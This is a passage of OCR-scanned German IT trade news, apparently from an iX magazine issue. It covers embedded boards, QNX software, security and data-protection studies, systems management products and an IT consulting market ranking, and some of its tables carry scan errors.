ces“ steht; mehr Details gibt 
es, wie zu allen iX-Veranstal- 
tungen, auf der Konferenz- 
Website www.ix-konferenz.de. 


Schnell buchen: Samba- 
Workshops mit Karolin 
Seeger und Volker 
Lendecke. 
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Klein, aber oho: Via EPIA P700 


Auf einer Platine von nur 
10x72 cm? (Pico-ITX-Board) 
bringt Via (www .via.com.tw) 
einen Embedded PC mit 12 
Volt Gleichspannungsversor- 
gung unter. Er basiert auf Vias 
VxX700-Chipsatz und läuft so- 
wohl mit der 1 GHz schnellen 
C7-CPU als auch dem Eden 
ULV (500 MHz). Die Variante 
mit Eden-CPU ist lüfterlos. In 
den Chipsatz integriert ist eine 
VIA Unichrom Pro II 3D/2D 
AGP Grafik mit Video Deco- 


ding Accelerator für MPEG-2/4 
und WMV9. Ein GByte DDR- 
Speicher (533/667 MHz) in 
Form eines Notebook-SO-Mo- 
duls verkraftet das Board. Ne- 
ben einem SATA-Anschluss 
samt 5-V-Stromstecker gibt es 
einen 44-poligen UltraDMA- 
133-Anschluss in 2-mm-Bau- 
form, ebenfalls wie in einem 
Notebook. Während der VGA- 
Anschluss als normale Sub-D- 
Buchse ausgeführt ist, liegt der 
DVI-Port auf einem Steckfeld. 


Ebenso verhält es sich mit dem 
LVDS-Interface (Low Voltage 
Differential Signaling) zum di- 
rekten Anschluss eines LCD- 
Moduls. Zur Kommunikation 
mit der Außenwelt dienen zwei 
serielle Ports, viermal USB 2.0 
und einmal GpBit-Ethernet. 
Über einen Stecker erreicht 
man den System Management 
Bus (SMB), ein Watchdog-Ti- 
mer ist integriert. Dafür fehlt 
ein Steckplatz für ein WLAN- 
Modul. Axel Urbanski 


QSeven-Spezifikation 1.0 für Einplatinencomputer veröffentlicht 


Das QSeven-Konsortium hat 
seine erste Spezifikation für 
einen standardisierten Einpla- 
tinencomputer veröffentlicht 
(www.gseven-standard.org). Es 
hat sich zum Ziel gesetzt, ei- 
nen Single-Board-Computer 
(SBC) zu entwerfen, der alle 
Kernkomponenten eines PCs 
integriert und auf einer anwen- 
dungsspezifischen Trägerpla- 
tine Platz findet. Dem Konsor- 
tium gehören Hersteller wie 
MSC (www .msc-ge.com), Con- 
gatec (www.congatec.com), 
Seco (www.seco.it), IEI (www. 
jei.com.tw) und Portwell (www. 
portwell.com.tw) an. 

Die Platine ist nur 70 x 70 
mm? groß und erinnert an ein 
WLAN-Modul im Mini-PCI- 
Format (siehe Abbildung). 
Die Spezifikation beschreibt 
primär die mechanischen und 
elektrischen Eigenschaften 
des Boards. 

In seinem 230-poligen So- 
ckel sichert man es zusätzlich 
mit vier Schrauben. Die Leis- 
tungsaufnahme ist auf 12 
Watt begrenzt. Mit 5 Volt 
Gleichspannung wird das 
Modul versorgt, ergänzt um 
5 Volt Standby und 3 Volt 
aus einer Stützbatterie. Auf 
klassische Interfaces wie 
ISA, PCI, EIDE oder VGA 
haben die Entwickler ver- 
zichtet und auf neue Stan- 
dards wie SATA, PCI-Ex- 
press oder das LVDS Display 
Interface gesetzt. Zudem ver- 
wenden sie die aktuelle 
SDIO-Schnittstelle (Secure 
Digital VO 8-Bit) für den An- 
schluss von SD-Karten. Die 
minimale und maximale Be- 
stückung ist ebenfalls Teil 
der Spezifikation (siehe Ta- 
belle). 


Nur fünf von fünfzig Sei- 
ten der Spezifikation be- 
schäftigen sich mit Software 
und der API, diese liefern ei- 
nen Einblick in das geplante 
Einsatzgebiet. Die künftigen 
Hersteller sollen Bibliothe- 
ken für Windows Vista 32, 
XP, XP embedded, CE und 


Voll bestückt: 
Sämtliche 
Komponenten 
eines Computers 
haben auf der 
7x7 cm? kleinen 
Platine ihren Platz. 


1/0 System Interface 
PCI-Express Lanes 

Expresscard Support 0 
Serial ATA 


USB 2.0 

LVDS Channels 

Displayport, TMDS, SDVO 
High Definition Digital Audio 
Gigabit Ethernet 

Low Pin Count Bus 
SD/MMCKarten 

System Management Bus 
PC Bus 

Watchdog Trigger 

Power Button 

Power Good 

Reset Button 

LID Button 

Sleep Button 

Suspend To RAM (53 mode) 
Wake 

Batterie-Alarm 

Thermofühler 

Lüfterkontrolle 


ooooooo—-.—---- - 5 —_- o—-o00_0 


Minimum 
2 (x1 link) 4 


Linux liefern. Vermuten darf 
man daher, dass es sich bei 
dem Embedded-System für 
mobile Anwendungen um ei- 
nes auf Basis von x86-Pro- 
zessoren handeln wird. 

Axel Urbanski 
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Doppelt verbessertes Freisprechen mit QNX 


Mit der neuen Version 1.2 des 
Aviage Acoustic Processing 
Kit hat das kanadische Unter- 
nehmen QNX Software Sys- 
tems (www.qnx.com) das Frei- 
sprechen als Softwarefunktion 
in das QNX-Embedded-Echt- 
zeitbetriebssystem integriert. 
Das Kit unterstützt eine Reihe 
von 32-Bit-CPUs und DSPs 
(Digital Signal Processors), 
darunter ARM9+, SH-4+, 
PowerPC-Prozessoren und TI- 
C64x-DSPs. Außerdem kann 
man Programmteile an einen 
Signalprozessor delegieren. 
Das soll vor allem die 
Sprachqualität der mit QNX 
betriebenen Produkte verbes- 
sern und die Entwicklung von 
Freisprecheinrichtungen be- 
schleunigen. Das Anpassen ei- 
ner festen Freisprecheinrich- 
tung an einen Fahrzeugtyp 
kann eine Woche dauern. Mit 
Geräten auf Basis des Aviage 
Acoustic Kits soll es in nur ei- 
nem halben Arbeitstag erledigt 
sein. Mit einer dazugehörigen 
Windows-Software kann der 
Techniker während eines lau- 
fenden Telefonats Einstellun- 
gen justieren, die Leistung an- 
passen, Features ein- oder 
ausschalten, Audio-Streamings 


stoppen und starten, die Biblio- 
thek neu starten oder zurück- 
setzen, Vorgänge aufzeichnen 
und eine Fehlersuche durch- 
führen. 

Für den Nutzer ist dagegen 
die Sprachqualität ausschlagge- 
bend. Zu den Funktionen gehört 
eine Echo- und Rückkopp- 
lungsunterdrückung für die 
Fahrzeuglautsprecher, Vermin- 
derung von Windgeräuschen, 
automatische Anpassung der 
Wiedergabelautstärke und Ver- 
stärkungsregelung. Hinzu ge- 
sellen sich ein Mixer für zwei 
Mikrofone, ein parametrierba- 
rer Equalizer sowie ein Begren- 
zer/Kompressor, die die Fremd- 
und Windgeräusche unterdrü- 
cken. Da die Bandbreite eines 
GSM-Gespräches begrenzt ist, 
werden höhere Frequenzen nach 
unten verschoben, was die Ver- 
ständlichkeit hoher Stimm- 
lagen deutlich verbessert. Die 
Einstellungen der Freisprech- 
einrichtung passen sich dyna- 
misch an die Gegebenheiten an. 

Freisprecheinrichtungen mit 
dem Kit setzen Audi, BMW, 
Chrysler, Fiat, GM, Honda, 
Hyundai, Mercedes-Benz und 
Porsche in einigen ihrer Mo- 
delle ein. Axel Urbanski 


Neues TraceX für das RT-OS ThreadX 


Mit der neuen Version 3.1 des 
System Event Analysis Tool 
TraceX lassen sich die Akti- 
vitäten des Embedded-Real- 
time-Betriebssystems ThreadX 
besser verfolgen und so die 
Entwicklung vereinfachen. Das 
aus der US-Softwareschmiede 
Express Logic (www Itos.com) 
stammende TraceX läuft unter 
Windows und kann geräteab- 
hängige Eventlogs erstellen, die 
sich wie in einem Logic Ana- 


lyzer auswerten lassen. Die 
Darstellung erfolgt wahlweise 
nach Priorität, sequenziell oder 
chronologisch. Untersuchen 
lassen sich Interrupts, ThreadX- 
API-Aufrufe, applikationsspe- 
zifische Ereignisse, Kontext- 
umschaltung einschließlich 
Wiederaufruf, Beendigung und 
Wartezeiten von Threads. Li- 
zenzen kosten etwa 1000 US- 
Dollar pro Installation. 

Axel Urbanski 


Intels Atom startet QNX in 1,8 Sekunden 


Das Realtime-Betriebssystem 
QNX Neutrino kommt mit 1,8 
Sekunden für einen Kaltstart ei- 
nes Intel-Atom-Prozessors der 
Z500-Serie aus. Gemessen hat 
QNX das mit einem Neutrino 
auf SD-Card. 

Nach dem Einschalten benö- 
tigt der Prozessor etwa 30 ms, 
bis er den ersten Befehl aus- 
führt. Der startet ein Stabilisie- 
rungsprogramm. Der Vorberei- 
tung folgt das Bootprogramm 
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und lädt den Neutrino-Kernel 
ins RAM. Nach Angaben von 
QNX passt der Kernel in den 
L2-Cache des Atom. Es folgt 
das Build-Skript, das Treiber 
und Applikationen nachlädt, in 
diesem Fall eine einfache Ado- 
be-Flash-Oberfläche. 

Einen ähnlichen Weg geht 
das Coreboot-Projekt (vormals 
Linuxbios). Dort fehlt es aber 
an Intels Unterstützung. 

Axel Urbanski 
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MARKT + TRENDS 


Sicherheit 


Onlinetraining zu Webgefahren 


Microsoft hat gemeinsam mit 
der Ludwig-Maximilians-Uni- 
versität (LMU) München den 
Internet Risk Behaviour Index 
(IRBI) entwickelt. Auf der Si- 
mulationsplattform unter www. 
irbi.de kann jeder Internetnutzer 
ausprobieren, wie gut er gefähr- 
liche von ungefährlichen Web- 
seiten unterschieden kann. Das 
System ist als adaptive Lernum- 
gebung konzipiert. IRBI zeigt 
Bildschirme und Fenster häufig 
benutzter Anwendungen und 
Webseiten täuschend ähnlich 
an. Für richtige oder falsche 
Entscheidungen gibt es mehr 


oder weniger Punkte und 
unmittelbares Feedback. Der 
Anwender lernt so, sein Si- 
cherheitswissen richtig einzu- 
schätzen. 

Simulierte Risiken sind bei- 
spielsweise Spielarten des 
Identitätsdiebstahls und unter- 
schiedliche Tricks, mit denen 
Angreifer Viren und Trojaner 
auf die PCs schleusen. Micro- 
soft plant, neue Risiken im 
Web regelmäßig in IRBI-Si- 
mulationen umzusetzen. Einzi- 
ger Wermutstropfen: Nur wer 
sich registriert, kann sie benut- 
zen. Susanne Franke 


(WEIT 
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Ohne Datensammeln geht heutzutage nichts mehr: Leider muss 
man sich auch für das sinnvolle Internetbedrohungslernprogramm 
vor Gebrauch zuerst bei Microsoft registrieren lassen. 


Biometrie: Wie man Bio- 
metrie datenschutzverträglich 
einsetzen kann, beschreibt 
das kostenlose Whitepaper 
„Datenschutz in der Bio- 
metrie“. Das 30-seitige PDF 
(iX-Link) stellt Risiken und 
Gegenmaßnahmen sowie 
Entscheidungen von Daten- 
schutzkommissionen und 
Gerichten vor. 


Virtuelle Appliance: Das 
Web Gateway von Astaro, 
das unter anderem Funktionen 
wie Malware- und URL-Filte- 
rung sowie IM- und P2P- 
Kontrolle enthält, ist nun auch 
als virtuelle Appliance erhält- 
lich. Die unter VMware auf 
vorhandener Hardware lau- 
fende Anwendung ist bei- 
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spielsweise für die Wieder- 
herstellung von Schulungs- 
oder Demonstrationsplatt- 
formen oder den Test neuer 
Sicherheits-Features geeignet. 
Eine Testversion gibt es nach 
Registrierung auf der Astaro- 
Website (iX-Link). 


DLP für Datenbanken: 
Die neue Version von Vontu 
Data Leakage Prevention 
aus dem Hause Symantec 
(www .symantec.com/de) 
unterstützt SQL-Datenban- 
ken, die sich so nach vertrau- 
lichen Inhalten durchsuchen 
lassen. Das für nahezu alle 
Datenspeicher im Unterneh- 
men geeignete Produkt ent- 
hält drei verschiedene Scan- 
Ansätze: agentenbasiert auf 
Endgeräten, auf Servern und 
zentrales Scannen. 
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Datenschutzschlamperei bei Webformularen 


85 Prozent der Webseiten, die 
Kontaktformulare als Kom- 
munikationsmittel nutzen, in- 
formieren ihre Nutzer nicht 
über die Verwendung dieser 
Daten. Das ist das Ergebnis 
der Studie „Wie Unternehmen 
im Internet bei Konsumenten 
Misstrauen säen“ der Xamit 
Bewertungsgesellschaft mbH. 
Kontaktformulare sind ein 
wichtiger Bestandteil von Web- 
präsenzen. Doch wie gehen 
die Betreiber mit den anfallen- 
den personenbezogenen Daten 
um? Zur Beantwortung dieser 
Frage untersuchte das Düssel- 
dorfer Unternehmen den Quell- 
code der Webpräsenzen von 
16 500 Unternehmen und öf- 
fentlichen Einrichtungen, ins- 
gesamt 815 000 Webseiten. 
Dabei waren 1190 Gemein- 
den, 1770 Vereine und mittel- 
ständische Unternehmen aus 
unterschiedlichen Branchen. 
Kriterien der maschinellen 
Analyse: Fragt die Webpräsenz 
persönliche Daten wie Name, 
Anschrift und E-Mail-Adresse 
ab? Ist eine Datenschutzerklä- 
rung hinterlegt, die der Nutzer 
mit höchstens einem Klick vom 


Kontaktformular aus abrufen 
kann? Ergebnis: 41 Prozent der 
durchforsteten Webpräsenzen 
nutzen Kontaktformulare. Aber 
nur 15 Prozent informieren 
über ihren Umgang mit den 
erhobenen Daten. Unter den 
kritisierten Webauftritten befin- 
den sich auch prominente wie 
diejenigen der Bundesregie- 
rung, des Auswärtigen Amts 
und des Bundesministeriums 
für Wirtschaft und Technologie 
sowie die vieler Gemeinden. 
Vorbildlich sind nach Angaben 
der Studie nur ganz wenige. Le- 
diglich zwei Prozent aller unter- 
suchten Webpräsenzen (mit und 
ohne Kontaktformular) veröf- 
fentlichen eine Datenschutzer- 
klärung und verlinken diese di- 
rekt mit dem Kontaktformular. 
Die kostenlos verfügbare Stu- 
die (www.xamit-leistungen.de/ 
downloads/XamitStudieKontakt 
formulare.pdf) enthält Hinweise 
für Betreiber von Webseiten, 
wie sie Kontaktformulare da- 
tenschutzkonform in ihre Web- 
präsenzen einbinden können. 
Barbara Lange 
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RFID: Viel Debatte, wenig Praxis 


Die Zahl der tatsächlichen 
RFID-Implementierungen ist 
gering im Vergleich zum An- 
wendungspotenzial. Viele Un- 
ternehmen wissen nicht, wie sie 
RFID-Systeme wirtschaftlich 
einsetzen können. Mangelnde 
technische Standardisierung 
und hohe Ausgaben für Trans- 
ponder, Infrastruktur sowie 
Software verstärken diese Un- 
sicherheit. Auch in Fachkreisen 
fehlen noch Aussagen über Er- 
folgsfaktoren für einen wirt- 
schaftlichen Einsatz der berüh- 
rungslosen Funktechnik. Zu 
diesem Ergebnis kommt das 
International Performance Re- 
search Institute (IPRI) in seiner 
Studie „Wirtschaftlicher Ein- 
satz von RFID“. Sie soll die 
Grundlage bilden für ein zu ent- 
wickelndes Analyse-Instru- 
ment, das Unternehmen beim 
RFID-Einsatz hilft und diesen 
sowohl technisch als auch 
ökonomisch untersucht. Ein- 
zubeziehen seien überdies di- 
rekte und indirekte Auswir- 
kungen der Funktechnik im 
Unternehmen, Projektplanung 


und Probleme bei der Imple- 
mentierung. 

Fragen zum tatsächlichen 
oder geplanten Einsatz von 
RFID stellte IPRI über 5000 
deutschen Unternehmen, über- 
wiegend aus den Bereichen 
produzierende Industrie und 
produktionsnahe Dienstleistun- 
gen. Einige Ergebnisse: Dass 
zum Beispiel „Kundenbindung“ 
ganz oben auf der Liste der 
Unternehmensziele für einen 
RFID-Einsatz steht, sehen die 
Studienautoren als ein bemer- 
kenswertes Ergebnis im Hin- 
blick auf die Entwicklung eines 
Instruments zur Wirtschaftlich- 
keitsbewertung. Bei der Imple- 
mentierung hatten die Unter- 
nehmen mit Hindernissen wie 
einem zu hohen Datenaufkom- 
men oder Zeitverzögerungen 
zu kämpfen. Bei Middleware- 
Lösungen setzten die meisten 
Unternehmen Eigenentwick- 
lungen ein. Interessierte kön- 
nen die Ergebnisse der Studie 
über die Website www .ipri-in 
stitute.com anfordern. 

Barbara Lange 
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MARKT + TRENDS 


Systemmanagement 


Support und Add-ons für i-doit 


Die quelloffene Software i-doit 
(www.i-doit.org), ein ITIL- 
konformes Dokumentations- 
system zur Verwaltung der IT- 
Landschaft, ist in der Version 
0.9.3 verfügbar. Diverse klei- 
nere Ausbauten sollen Stabilität 
und Performance verbessern. 
Neuerdings bietet i-doit-Ent- 
wickler Synetics ergänzende 
kostenpflichtige Dienstleistun- 
gen an, als erstes Produkt eine 
Support-Box. Sie ist in der ers- 
ten Fassung mit drei Support- 
anfragen „bestückt“, die Kun- 
den innerhalb eines Jahres 
einlösen können. Die Abwick- 
lung erfolgt über Internet und 
Telefon. Neben dem Support- 
Schein sind eine gedruckte Fas- 


sung des Benutzerhandbuchs 
zur Version 0.9.3 sowie die ak- 
tuelle Version auf CD Bestand- 
teil der Box. Käufer erhalten 
darüber hinaus zwei Add-ons 
von Synetics, die erst zu einem 
späteren Zeitpunkt allgemein 
verfügbar sein sollen: Einen 
Reportmanager und ein Werk- 
zeug zur automatischen Inven- 
tarisierung von Windows-, Li- 
nux-, Mac- und BSD-Systemen. 
Letzteres Add-on besteht im 
Kern aus der generischen Im- 
und Export-Schnittstelle von 
i-doit, die unter anderem das 
Einlesen von Informationen 
aus dem französischen Open- 
Source-Projekt H-Inventory 
ermöglicht. 


Folgen von IT-Ereignissen im Blick 


IDS Scheer nutzte die eigene 
Anwenderkonferenz Aris Pro- 
cessworld dafür, die Kombilö- 
sung aus Aris Business Archi- 
tect und BMC Atrium CMDB 
vorzustellen. Mit dem von bei- 
den Firmen gemeinsam entwi- 
ckelten Produkt BMC Disco- 
very for Business Processes 
lassen sich Geschäftsprozess- 
modelle im Aris Business Ar- 
chitect automatisch aufdecken 
und dynamisch den entspre- 


Zertifiziert: DX-Union von 
Materna erhielt mit dem Sta- 
tus „Citrix Ready“ die of- 
fizielle Bestätigung, dass 
sich Citrix-Farmen über die 
Arbeitsplatzmanagementsoft- 
ware verwalten lassen. Die ab 
September 2008 verfügbare 
Version 6.2 soll die Unter- 
stützung auf Citrix Xenapps- 
Farmen erweitern. 


Finanzspritze: NTRglobal 
erhielt in einer neuerlichen 
Finanzierungsrunde 22 Mio. 
Euro von Kennet Partners 
und Atlas Venture. Mit dem 
frischen Kapital will das 
Unternehmen den Ausbau 
des Vertriebs seiner On- 
Demand-Lösungen für Ad- 
ministration und Collabora- 
tion forcieren. Zu den Lö- 
sungen zählen NTRadmin 
(Remote System Manage- 
ment), NTRadmin BOTS 
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chenden Informationen zu IT- 
Services und Infrastruktur in 
BMC Atrium CMDB zuord- 
nen. Über eine Schnittstelle 
werden hierzu die Daten der 
CMDB extrahiert und in das 
Repository von Aris impor- 
tiert. Durch die Kombination 
der Produkte lässt sich nach- 
vollziehen, welcher Geschäfts- 
prozess wie stark von einem 
bestimmten Vorfall in der IT- 
Infrastruktur betroffen ist. 


(Automatisierung von IT- 
Aufgaben) und NTRsupport 
(Help Desk). 


Hilfestellung: Quest Soft- 
ware hat neue Releases für 
die Verwaltung von SQL- 
Server-Umgebungen vor- 
gestellt. Version 2.5 des 
Capacity Manager for SQL 
Server plant die Kapazität 
von SQL-Server-Datenban- 
ken und Anwendungen. 


Kombipack: ASG Software 
Solutions kooperiert mit Mi- 
crosoft auf dem Gebiet des 
Performance-Managements. 
Eine gemeinsame Program- 
mierschnittstelle (API) ver- 
bindet Microsofts System 
Center Operations Manager 
mit der Business Service 
Plattform von ASG. Über 
diesen Weg gelangen Infor- 
mationen über die Serverleis- 
tung ins Service-Manage- 
ment. Zentraler Bestandteil 
von BSP ist eine CMDB- 
Komponente. 


Markt für Speichermanagement wächst 


Weltweit legten die Einnah- 
men mit Speichermanagement- 
Software (SMS) im vergan- 
genen Jahr um 12,2 % auf 10,6 
Mrd. Dollar zu. Insbesondere 
die Geschäfte mit Programmen 
für Backup/Recovery und Da- 
tenreplikation trugen dazu bei. 
Zu diesem Schluss kommen 
die Analysten der Gartner 
Group in ihrer alljährlichen 
Analyse. Wie in den Jahren zu- 
vor hatte der Trend Bestand, 
dass die führenden Anbieter 
einen wachsenden Part am 


Gesamtvolumen vereinnahmen. 
2007 konnten die fünf umsatz- 
stärksten Firmen ihren Anteil 
auf über 74 % ausbauen, wo- 
bei der Zuwachs zum Teil 
Folge der Akquisition kleine- 
rer Anbieter war. Unstrittig die 
Nummer eins unter den SMS- 
Herstellern war mit 26,5 % 
EMC, auch wenn der Vor- 
sprung zur Konkurrenz um ei- 
nige Punkte schrumpfte. Den 
größten Wachstumsschub wie- 
sen Netapp mit 35,5 % und 
IBM mit 29,3 % auf. 


Anbieter Umsatz 2007 Marktanteil Umsatz 2006 Marktanteil Wachstum 

EMC 2,805 26,5 % 2) 28,9% 2,17% 

Symantec 1,946 18,4 % 1,767 18,7% 10,1% 

IBM 1,394 13,2 % 1,078 11,4% 29,3% = 

NetApp 1,105 10,4 % 0,816 8,6% 35,5% S 

HP 0,628 59% 0,589 6,2% 6,6% 3 

Sonstige 2,116 25,6% 2,461 26,1% 10,4 % 8 

total 10,594 100,0 % 9,443 100,0 % 12,2% = 
e) 


CA bringt acht Werkzeuge auf einen Streich 


CA bringt im Rahmen seiner 
EITM-Strategie (Enterprise IT 
Management) acht neue Pro- 
dukte auf den Markt. Die 
Werkzeuge sollen Unterneh- 
men dabei unterstützen, über 
verteilte Umgebungen hinweg 
Betriebsrisiken zu senken und 
gleichzeitig Compliance-Anfor- 
derungen effektiv zu managen. 
Zu den Neuvorstellungen zählt 
der IT Process Manager, mit 
dem Unternehmen automati- 
siert Workflows für die Unter- 
stützung ihrer IT-Prozesse ent- 
wickeln, verwalten und darüber 
Reports anlegen können. Er 
kann mit über 30 Management- 
Systemen von CA, aber auch 
von Drittanbietern wie IBM, 
BMC, HP und Microsoft zu- 
sammenarbeiten. Per „Drag und 
Drop“ lassen sich IT-Manage- 
ment-Prozesse abteilungsüber- 
greifend einrichten. Zum Lie- 
ferumfang gehören Vorlagen 
(Templates), die das Definieren 
regelbasierter Workflows über 
verschiedene Systeme hinweg 
vereinfachen sollen. 

Die Release r11.2 von ASM 
(Advanced Systems Manage- 
ment), das dem plattform- und 
herstellerunabhängigen Ma- 
nagement physischer und vir- 
tueller Umgebungen dient, lässt 
sich nun mit VMwares Virtual- 
center verknüpfen und unter- 


stützt Suns Logical Domains 
(LDOM). Wie der Name na- 
helegt, kommt „OPS/MVS 
Event Management and Auto- 
mation“ fürs Management der 
z/OS-System-Ressourcen auf 
IBM-Mainframes zum Ein- 
satz. Das neue Release 11.6 
enthält die Switch Operations 
Facility (SOF), die Administra- 
toren Einblick in den Zustand 
komplexer ESCON (Enterprise 
Systems Connection)- und Fi- 
ber-Connectivity-Infrastruktu- 
ren (FICON) gewährt. 

Außer den genannten drei 
Automatisierungswerkzeugen 
hat CA fünf weitere vorgestellt, 
die primär auf das unterneh- 
mensweite Risikomanagement 
ausgerichtet sind. Namentlich 
handelt es sich um den GRC 
Manager r1.5 (automatisiert die 
Verwaltung von Governance-, 
Risk- und Compliance-Program- 
men), den Security Compliance 
Manager (spürt Sicherheits- und 
Compliance-Verstöße auf und 
initiiert die Korrektur), Access 
Control r12 (unterstützt ein ag- 
gregiertes Reporting von Zu- 
griffsrechten und Regeln), Iden- 
tity Manager r1l2 (verwaltet 
Nutzeridentitäten) sowie den 
Software Compliance Mana- 
ger (erkennt unter anderem in- 
effizientes Software-Lizenz- 
management). 
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Wirtschaft 


MARKT + TRENDS 
IT-Beratung und Systemintegration: Lünendonks TOP 25 
Ä D 
Lukrative Forschung: 5 O Te e 5 Wa C h Stu m 


Die Fraunhofer-Gesell- 
schaft steigerte im Ge- 
schäftsjahr 2007 ihr Budget 
um 11 % auf 1,32 Mrd. €. 
Mit Auftragsforschung 
wurden insgesamt Erträge 
in Höhe von 776 Mio. € 
erwirtschaftet, aus Projek- 
ten mit der Wirtschaft ka- 
men 422 Mio. € dazu, und 
Bund, Länder und EU wa- 
ren mit 354 Mio. € dabei. 


Dickes Geschäft: Im 
deutschen Outsourcing- 
markt ist im laufenden 
und in den kommenden 
zwei Jahren mit einer 
jährlichen Wachstumsrate 
von durchschnittlich 

8,2 % zu rechnen, pro- 
gnostizieren die Marktfor- 
scher der Experton Group. 
Das Marktvolumen soll 
im Zeitraum 2007 bis 
2010 von 14 Mrd. € auf 
18 Mrd. € zulegen. 


Beeindruckend: Die Zahl 
der weltweit installierten 
PCs hat die Eine-Milliarde- 
Marke passiert. Zu diesem 
Ergebnis gelangt Gartner. 
Die US-Beratung rechnet 
mit einen jährlichen Zu- 
nahme von unter 12%. 
Legt man dieses Wachs- 
tumstempo zugrunde, kön- 
nen es 2014 bereits zwei 
Milliarden Systeme sein. 


Wechselspiele: Rund ein 
Drittel der Belegschaft 
von IBM muss innerhalb 
des Konzerns wechseln. 
Grund ist eine neue Kon- 
zernstruktur, die sich an 
den vier Bereichen Re- 
search & Development, 
Sales & Consulting, Solu- 
tions & Services und Ma- 
nagement & Business 
Support orientiert. 


Aus der Traum: Die 
skandinavische TK-Firma 
Teliasonera will sich nicht 
von France Telecom kau- 
fen lassen. Selbst das im 
Juni erhöhte Angebot aus 
Bargeld und Aktien, des- 
sen Wert sich auf insge- 
samt etwa 27 Mrd. € 
summiert hätte, konnte 
das Management nicht 
umstimmen. 
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Achim Born 


Der IT-Beratungsmarkt in Deutschland boomt. 

Von dem Wachstum profitieren in erster Linie die 
25 führenden Anbieter. Allerdings gibt es innerhalb 
dieser Gruppe interessante Verschiebungen. 


itkom wird nicht müde, auf 

die wachsende Nachfrage 
für IT-Beratung und Systemin- 
tegration am deutschen Markt 
hinzuweisen. Für das vergan- 
gene Jahr meldet der Industrie- 
Lobbyverband ein Wachstum 
um 6,4 % auf ein Gesamtvo- 
lumen von 15 Mrd. €. Fast 
40 % dieses Marktes, mithin 5,9 
Mrd. €. erwirtschaften hierbei 
die von der Kaufbeurener Lü- 
nendonk GmbH alljährlich er- 
mittelten 25 führenden Fir- 
men, die jeweils mindestens 
60 % ihres Umsatzes mit IT- 
Beratung und Systemintegra- 
tion erzielten. 

Mit einem durchschnitt- 
lichen Wachstum von 12,4 % 
legten die Top 25 der Branche 
überdurchschnittlich zu. Die 
Entwicklung der einzelnen 
Firmen ist recht unterschied- 
lich. So reicht die Bandbreite 
der Veränderungen bei den 
Inlandsumsätzen von plus 
45,5 % bis minus 35,1 %. 
Allerdings mussten nur vier 
der 25 Firmen im vergange- 
nen Jahr einen Umsatzrück- 
gang verkraften. Die Zuwäch- 
se der Inlandsumsätze fallen 
bei den Top 10 der Liste im 
Schnitt mit 4,2 % jedoch 
deutlich geringer aus als bei 
den mittelgroßen und kleine- 
ren Anbietern des Top-25- 
Rankings. 

Wie in den Vorjahren füh- 
ren IBM und Accenture die 
Liste an. Der Vergleich mit 
dem Ranking aus 2007 zeigt, 
dass die SAP in der Liste keine 
Erwähnung mehr findet, da sie 
inzwischen in den Mutterkon- 
zern integriert wurde. Dieser 
wird bekanntlich als Standard- 
software-Unternehmen geführt, 
da mehr als 60 % des Umsat- 
zes im Softwaregeschäft anfal- 
len. Die Atos Origin GmbH, 
im Vorjahr noch Nummer 3, 


führen die Lünendonk-Analys- 
ten heuer in der Liste IT-Ser- 
vice-Unternehmen. Neu aufge- 
rückt in das Beratungs- und 
Systemintegrations-Ranking ist 
die Münchener Allgeier Hol- 
ding AG, die sich von ihren 
Zeitarbeitsaktivitäten getrennt 
hat, und die auf die TK-Bran- 
che spezialisierte Kölner Te- 
con Technologies AG. 


Nur geringer 
Exportanteil 


Typisch für die im Bereich IT- 
Beratung und Systemintegra- 
tion aktiven Firmen ist ein im 


Vergleich zu Standardsoftware- 
Unternehmen relativ geringer 
Auslandsumsatzanteil. Von den 
15 Unternehmen der aktuellen 
Liste, die ihren Hauptsitz in 
Deutschland haben, wurde im 
Ausland mit rund 710 Mio. € 
ein vergleichsweise geringer 
Umsatz erzielt; der Exportan- 
teil blieb damit unverändert bei 
rund 24 %. 

Etwa 43 000 Mitarbeiter 
waren 2007 bei den Top 25 
Firmen in Deutschland be- 
schäftigt. Das sind rund 3000 
mehr als im Jahr davor. Da 
der Umsatz der Unternehmen 
im Mittel deutlich stärker ge- 
stiegen ist als die Mitarbeiter- 
zahl, ist der durchschnittliche 
Pro-Kopf-Umsatz von rund 
150 000 € 2006 um 3 % auf 
rund 155 000 € im letzten Jahr 
gestiegen. Für das laufende 
Jahr gehen die Top 25 von ei- 
nem durchschnittlich 8 %igen 
Wachstum aus. (WM) 


Rang Unternehmen Umsatz 
2007 
1 IBM Business Services 1200,0 
2 Accenture 735,0 
3 Lufthansa Systems 509,0 
IE 365,0 
5 Capgemini 361,0 
6 LogicacMG 258,0 
7 Cirquent 245,0 
8 __msg systems 232,5 
9 sd&m 186,0 
10 ESG 1779 
11 6FT Technologies 170,0 
12 TietoEnator 152,0 
13 1DS Scheer AG 148,4 
14 Group 146,0 
15 _ Materna 145,8 
16  If-Serices and 130,0 
Solutions 
17 Allgeier Holding 128,0 
18 BIC 105,6 
19 Itelligence %,3 
20 Sercon 93,6 
21  Unisys 87,0 
22 Syskoplan 57,5 
23 _ Mieschke Hofmann 47,8 
und Partner 
24 Tecon 47,1 
25 Danet 46,9 


Umsatz Mitarbeiter Mitarbeiter 
2006 2007 2006 
1056,0 kA kA 

682,0 4300 3996 
488,7 2540 2660 
405,0 3000 3600 
344,0 429 3754 
244,5 2200 2100 
228,0 1535 1493 
220,1 1970 1945 
178,0 1400 1218 
180,7 1070 1008 
137,0 301 29% 
124,0 1350 1062 
1257) 1400 1320 
118,0 980 855 
124,9 1105 1084 
136,2 1100 1200 
88,0 1280 980 
82,8 963 631 
73,9 647 527 
93,6 800 800 
134,0 339 435 
45,2 395 326 
37,7 359 298 
32,6 362 256 
46,9 410 4322 
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MARKT + TRENDS 


Wirtschaft 


Auf Kurs: Die Datev stei- 
gerte den Umsatz 2007 
um 5 % auf 614,1 Mio. €. 
Das Betriebsergebnis be- 
trug 37,8 Mio. €. Für 
2008 rechnet das Manage- 
ment des Nürnberger Soft- 
ware- und IT-Dienstleis- 
tungsunternehmens mit 
einem Umsatzzuwachs auf 
rund 642 Mio. €. 


Wissen, was läuft: Nokia 
übernimmt den Service- 
Provider Plazes (www. 
plazes.com). Das Berliner 
Internet-Start-up mit 13 
Mitarbeitern bietet einen 
kontext- und ortsbezo- 
genen Social-Activity- 
Dienst an, mit dem Men- 
schen ihre täglichen 
Aktivitäten planen, spei- 
chern und untereinander 
austauschen können. 


Einfach mal fragen: 
Microsoft übernimmt mit 
Powerset einen Pionier 
für semantische Suchma- 
schinen. Im Unterschied 
zu der gewöhnlichen 
Schlagwortsuche unter- 
stützt Powerset ausformu- 
lierte Anfragen in natür- 
licher Sprache. Microsoft 
soll laut Schätzungen 
rund 100 Mio. $ für den 
